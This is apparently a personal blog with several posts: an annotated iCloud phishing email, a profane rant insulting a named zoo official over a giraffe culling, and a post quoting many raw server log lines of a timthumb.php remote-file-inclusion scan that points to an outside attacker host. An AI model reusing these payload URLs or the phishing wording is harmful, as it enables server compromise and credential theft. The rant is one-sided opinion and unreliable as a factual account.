I just got this very official-looking mail in my main address:

It reads like this:

Dear javi@lavandeira.net, (19 – September – 2014)

This message is to therefore warn you that your iCloud and Apple Account (javi@lavandeira.net) has been temporarily locked until we can validate your Apple Account details. This protective measure to secure your iCloud Account from unapproved usage. We apologise for any inconvenience you’ve been caused.

You will be unable to use iTunes or iCloud sync/backup or the iTunes/App Store & App Store until you verify your Apple Account ownership, we urge you to finish verification as soon as you can. Failure to validate your details within a 48 hours can cause termination of your Apple/iCloud ID to safeguard our system.

How to verify my Apple ID and restore access?
Just proceed to the link underneath to prove ownership of your Apple ID. Log-in in using your Appe/iCloud ID and password, then read the instructions.

> Certify My Apple Account

While using Apple devices and services, you’ll still sign in with your main email address as your Apple ID.

If you have questions and need help, visit the Apple Account Care site.

Thanks again,
Apple Account Maintenance Team

Case Support ID: #Y10FHK10419-EU10

It sounds very scary and serious. Should I click the link and log in with my Apple ID and password?

No.

This is just another phishing attempt. You are likely to receive a similar email. Do not, under any circumstances, click on the link and enter your details. I repeat: it’s just another phishing attempt.

Looking a bit closer we can see that the message’s reply-to header points to an address in the ioscareteam.co.uk domain. This domain doesn’t belong to Apple:

The link in the body of the message also points to the same domain. Just place the mouse pointer over the link (without clicking) and wait a couple seconds:

They ask for your ‘Appe’ ID :-D

Clicking the link would take you to a very convincing fake Apple site that copies Apple’s real site. Looks like they even copied the country/language selection code.

However, this fake site will send your login details to the idiots who are trying to scam you:

Summary: if you get an email like the one I got, ignore it.

Yesterday (February 9th 2014), the Copenhagen Zoo murdered Marius, a 18-month giraffe baby by shooting him in the head. They then proceeded to dismember his corpse in front of the zoo visitors and feed the corpse to the lions.

Social networks and news sites are all echoing this crime. Just a few examples:

• ABC.es (Spanish newspaper): El zoo de Copenhagen sacrifica a una jirafa sana pese a una intensa campaña online (The Copenhagen zoo kills a healthy giraffe in opposition to a heated online campaign)
• The Independent: Danish zoo to kill ‘surplus’ young giraffe and feed him to the lions
• BBC News Europe: ‘Surplus’ giraffe put down at Copenhagen Zoo
• The Guardian: Copenhagen zoo sparks outrage by killing healthy giraffe named Marius
• TIME: Did Marius the Giraffe Have to Die?
• The Mirror: Zoo bosses who approved killing of  Marius the giraffe should be sacked say campaigners

There was nothing wrong with Marius. He was a completely healthy animal. However, Bengt Holst, Director of Research and Conservation at Copenhagen Zoo, decided that Marius wasn’t genetically valuable enough. Other zoos offered to adopt Marius, but Holst declined the offers and decided that it would be a better show to kill the baby giraffe and carve the corpse in front of the public.

This is a photo of this fucking son of a bitch (it’s the dude on the left, the elephant is innocent):

In my opinion, this bastard, together with all the staff involved in the killing, should be immediately fired, forbidden to ever work with animals again, and put on trial for cruelty against animals. Under his direction, the Copenhagen Zoo sacrifices 20-30 animals per year.

There are several petitions online to get Holst fired or force him to resign. Here are two of them:

• Petition at Change.org for the resignation of Bengt Holst
• Petition at thepetitionsite.com to have him fired

You should sign these, but you know how these things work: online petitions will most likely be ignored. Please share this in all your social networks. It may also be effective to write a letter directly to the Copenhagen Zoo and express your feelings about this killing. Here’s the address:

WARNING: what follows are the photos of the killing and dismembering process. There are lots of blood, so don’t read the rest of the post if you’re sensitive to this stuff.

Just as I finished the previous post, this pops up in my Varnish log:

A script kiddy using a host in Italy to bruteforce my WordPress password. What a waste of time and bandwidth.

My friend, please try something more sophisticated. I’m sure there are some holes on my system somewhere just waiting to be exploited.

My web server was attacked by some guy in Germany last night. This is happens several times a day, so it’s usually not a concern. Ths time it happened while I was monitoring the server, so I had some fun looking at what the attacker was trying to do.

When I’m working on the computer at home I usually have a terminal window open in the background. In this window I’m usually watching all requests to my web server in real time. Most of time time I don’t pay attention to it (it’s mostly search engines crawling my domains), but sometimes you catch something interesting. This is an example of the kind of attacks hitting every web server on the Internet many times a day.

I was having dinner when I saw several strange requests to the Varnish server in front of my backend web server:

85.214.110.68 - - [28/Apr/2013:22:47:48 +0900] "GET /wp-content/themes/Momento/timthumb.php?src=http://flickr.com.finnovations.de/parola.php HTTP/1.1" 400 300 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.1) Opera 7.01 [en]"
85.214.110.68 - - [28/Apr/2013:22:47:49 +0900] "GET /wp-content/plugins/sitepress-multilingual-cms//timthumb.php?src=http://flickr.com.finnovations.de/parola.php HTTP/1.1" 301 20 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.1) Opera 7.01 [en]"
85.214.110.68 - - [28/Apr/2013:22:47:50 +0900] "GET /wp-content/plugins/sitepress-multilingual-cms/timthumb.php?src=http://flickr.com.finnovations.de/parola.php HTTP/1.1" 404 3589 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.1) Opera 7.01 [en]"
85.214.110.68 - - [28/Apr/2013:22:47:52 +0900] "GET /wp-content/plugins/sitepress-multilingual-cms//assets/js/timthumb.php?src=http://flickr.com.finnovations.de/parola.php HTTP/1.1" 301 20 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.1) Opera 7.01 [en]"
85.214.110.68 - - [28/Apr/2013:22:47:52 +0900] "GET /wp-content/plugins/sitepress-multilingual-cms/assets/js/timthumb.php?src=http://flickr.com.finnovations.de/parola.php HTTP/1.1" 404 3589 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.1) Opera 7.01 [en]"
85.214.110.68 - - [28/Apr/2013:22:47:54 +0900] "GET /wp-content/plugins/sitepress-multilingual-cms//extensions/auto-thumb/timthumb.php?src=http://flickr.com.finnovations.de/parola.php HTTP/1.1" 301 20 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.1) Opera 7.01 [en]"
85.214.110.68 - - [28/Apr/2013:22:47:55 +0900] "GET /wp-content/plugins/sitepress-multilingual-cms/extensions/auto-thumb/timthumb.php?src=http://flickr.com.finnovations.de/parola.php HTTP/1.1" 404 3589 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.1) Opera 7.01 [en]"
85.214.110.68 - - [28/Apr/2013:22:47:56 +0900] "GET /wp-content/plugins/sitepress-multilingual-cms//functions/efrog/lib/timthumb.php?src=http://flickr.com.finnovations.de/parola.php HTTP/1.1" 301 20 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.1) Opera 7.01 [en]"
85.214.110.68 - - [28/Apr/2013:22:47:57 +0900] "GET /wp-content/plugins/sitepress-multilingual-cms/functions/efrog/lib/timthumb.php?src=http://flickr.com.finnovations.de/parola.php HTTP/1.1" 404 3590 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.1) Opera 7.01 [en]"
85.214.110.68 - - [28/Apr/2013:22:47:58 +0900] "GET /wp-content/plugins/sitepress-multilingual-cms//functions/timthumb.php?src=http://flickr.com.finnovations.de/parola.php HTTP/1.1" 301 20 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.1) Opera 7.01 [en]"
85.214.110.68 - - [28/Apr/2013:22:47:59 +0900] "GET /wp-content/plugins/sitepress-multilingual-cms/functions/timthumb.php?src=http://flickr.com.finnovations.de/parola.php HTTP/1.1" 404 3590 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.1) Opera 7.01 [en]"
85.214.110.68 - - [28/Apr/2013:22:48:00 +0900] "GET /wp-content/plugins/sitepress-multilingual-cms//fws/addons/timthumb/timthumb.php?src=http://flickr.com.finnovations.de/parola.php HTTP/1.1" 301 20 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.1) Opera 7.01 [en]"
85.214.110.68 - - [28/Apr/2013:22:48:01 +0900] "GET /wp-content/plugins/sitepress-multilingual-cms/fws/addons/timthumb/timthumb.php?src=http://flickr.com.finnovations.de/parola.php HTTP/1.1" 404 3590 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.1) Opera 7.01 [en]"
85.214.110.68 - - [28/Apr/2013:22:48:03 +0900] "GET /wp-content/plugins/sitepress-multilingual-cms//library/functions/timthumb.php?src=http://flickr.com.finnovations.de/parola.php HTTP/1.1" 301 20 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.1) Opera 7.01 [en]"
85.214.110.68 - - [28/Apr/2013:22:48:03 +0900] "GET /wp-content/plugins/sitepress-multilingual-cms/library/functions/timthumb.php?src=http://flickr.com.finnovations.de/parola.php HTTP/1.1" 404 3590 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.1) Opera 7.01 [en]"
85.214.110.68 - - [28/Apr/2013:22:48:05 +0900] "GET /wp-content/plugins/sitepress-multilingual-cms//helpers/timthumb/image.php?src=http://flickr.com.finnovations.de/parola.php HTTP/1.1" 301 20 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.1) Opera 7.01 [en]"
85.214.110.68 - - [28/Apr/2013:22:48:05 +0900] "GET /wp-content/plugins/sitepress-multilingual-cms/helpers/timthumb/image.php?src=http://flickr.com.finnovations.de/parola.php HTTP/1.1" 404 3590 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.1) Opera 7.01 [en]"
85.214.110.68 - - [28/Apr/2013:22:48:07 +0900] "GET /wp-content/plugins/sitepress-multilingual-cms//images/timthumb.php?src=http://flickr.com.finnovations.de/parola.php HTTP/1.1" 301 20 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.1) Opera 7.01 [en]"
85.214.110.68 - - [28/Apr/2013:22:48:08 +0900] "GET /wp-content/plugins/sitepress-multilingual-cms/images/timthumb.php?src=http://flickr.com.finnovations.de/parola.php HTTP/1.1" 404 3590 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.1) Opera 7.01 [en]"
85.214.110.68 - - [28/Apr/2013:22:48:09 +0900] "GET /wp-content/plugins/sitepress-multilingual-cms//inc/classes/timthumb.php?src=http://flickr.com.finnovations.de/parola.php HTTP/1.1" 301 20 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.1) Opera 7.01 [en]"
85.214.110.68 - - [28/Apr/2013:22:48:10 +0900] "GET /wp-content/plugins/sitepress-multilingual-cms/inc/classes/timthumb.php?src=http://flickr.com.finnovations.de/parola.php HTTP/1.1" 404 3590 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.1) Opera 7.01 [en]"
85.214.110.68 - - [28/Apr/2013:22:48:11 +0900] "GET /wp-content/plugins/sitepress-multilingual-cms//inc/timthumb.php?src=http://flickr.com.finnovations.de/parola.php HTTP/1.1" 301 20 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.1) Opera 7.01 [en]"
85.214.110.68 - - [28/Apr/2013:22:48:12 +0900] "GET /wp-content/plugins/sitepress-multilingual-cms/inc/timthumb.php?src=http://flickr.com.finnovations.de/parola.php HTTP/1.1" 404 3590 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.1) Opera 7.01 [en]"
85.214.110.68 - - [28/Apr/2013:22:48:14 +0900] "GET /wp-content/plugins/sitepress-multilingual-cms//include/timthumb.php?src=http://flickr.com.finnovations.de/parola.php HTTP/1.1" 301 20 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.1) Opera 7.01 [en]"
85.214.110.68 - - [28/Apr/2013:22:48:14 +0900] "GET /wp-content/plugins/sitepress-multilingual-cms/include/timthumb.php?src=http://flickr.com.finnovations.de/parola.php HTTP/1.1" 404 3590 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.1) Opera 7.01 [en]"
85.214.110.68 - - [28/Apr/2013:22:48:16 +0900] "GET /wp-content/plugins/sitepress-multilingual-cms//includes/functions/timthumb.php?src=http://flickr.com.finnovations.de/parola.php HTTP/1.1" 301 20 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.1) Opera 7.01 [en]"
85.214.110.68 - - [28/Apr/2013:22:48:16 +0900] "GET /wp-content/plugins/sitepress-multilingual-cms/includes/functions/timthumb.php?src=http://flickr.com.finnovations.de/parola.php HTTP/1.1" 404 3590 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.1) Opera 7.01 [en]"
85.214.110.68 - - [28/Apr/2013:22:48:18 +0900] "GET /wp-content/plugins/sitepress-multilingual-cms//includes/timthumb.php?src=http://flickr.com.finnovations.de/parola.php HTTP/1.1" 301 20 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.1) Opera 7.01 [en]"
85.214.110.68 - - [28/Apr/2013:22:48:19 +0900] "GET /wp-content/plugins/sitepress-multilingual-cms/includes/timthumb.php?src=http://flickr.com.finnovations.de/parola.php HTTP/1.1" 404 3590 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.1) Opera 7.01 [en]"
85.214.110.68 - - [28/Apr/2013:22:48:20 +0900] "GET /wp-content/plugins/sitepress-multilingual-cms//includes/timthumb/timthumb.php?src=http://flickr.com.finnovations.de/parola.php HTTP/1.1" 301 20 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.1) Opera 7.01 [en]"
85.214.110.68 - - [28/Apr/2013:22:48:21 +0900] "GET /wp-content/plugins/sitepress-multilingual-cms/includes/timthumb/timthumb.php?src=http://flickr.com.finnovations.de/parola.php HTTP/1.1" 404 3590 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.1) Opera 7.01 [en]"
85.214.110.68 - - [28/Apr/2013:22:48:22 +0900] "GET /wp-content/plugins/sitepress-multilingual-cms//js/timthumb.php?src=http://flickr.com.finnovations.de/parola.php HTTP/1.1" 301 20 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.1) Opera 7.01 [en]"
85.214.110.68 - - [28/Apr/2013:22:48:23 +0900] "GET /wp-content/plugins/sitepress-multilingual-cms/js/timthumb.php?src=http://flickr.com.finnovations.de/parola.php HTTP/1.1" 404 3590 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.1) Opera 7.01 [en]"
85.214.110.68 - - [28/Apr/2013:22:48:25 +0900] "GET /wp-content/plugins/sitepress-multilingual-cms//lib/timthumb.php?src=http://flickr.com.finnovations.de/parola.php HTTP/1.1" 301 20 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.1) Opera 7.01 [en]"
[...additional lines ommited...]

(Actually, these logs are from the backend web server running Apache. I’m not storing the request log on the Varnish machine.)

This guy was obviously scanning the web server for a script called timthumb.php. A quick search on Google shows that there was indeed a security problem with older versions of this program. It was possible to trick it into downloading a file from an attacker’s host and saving it into the server, where it could be later executed in order to compromise the system (see this link for details.)

I just realized now that ag0ny.com, the domain name that I had been using for over 12 years, has been stolen. It’s pointing to a site in Russia and is hosting what appears to be a web aggregator.

I’m not really going to pursue this because the domain was worthless. I just had an email address there that I barely used. I kept it because from time to time some old friend or another sent me an email there. Plus, another person had an @ag0ny.com address on my server (JPGrobler: if you read this, now you know why your email address isn’t working anymore, I’m sorry).

So remember, if you want to contact me via email, my current email address is javi@lavandeira.net, not the old ag0ny@ag0ny.com.

ag0ny.com at the Internet Archive Wayback Machine, just for nostalgia.

Imagine that you’re a professional photographer: you earn money by taking photos and licensing them to customers who want to use them. One day while browsing the web you find a web site using one of your commercial photos illegally. You wonder how many people are doing the same, so you run an online search and find out that there are many, many web sites using your photo illegally.

You want these people to stop using your work. You could try and contact each of the web site owners, but you know that it’s going to be pointless because most don’t have contact information, or the contact person doesn’t have access to the web code, or they will just ignore you. You decide to send DMCA takedown notices to the companies hosting each of these web sites, so they will get in touch with their customers and ask them to remove your photo from their web sites.

As a result of the DMCA takedown requests, many of the web sites remove your photo, others offer to license it, as they should have done from the beginning. It seems to be going well.

Until a crazy psychotic person enters the scene.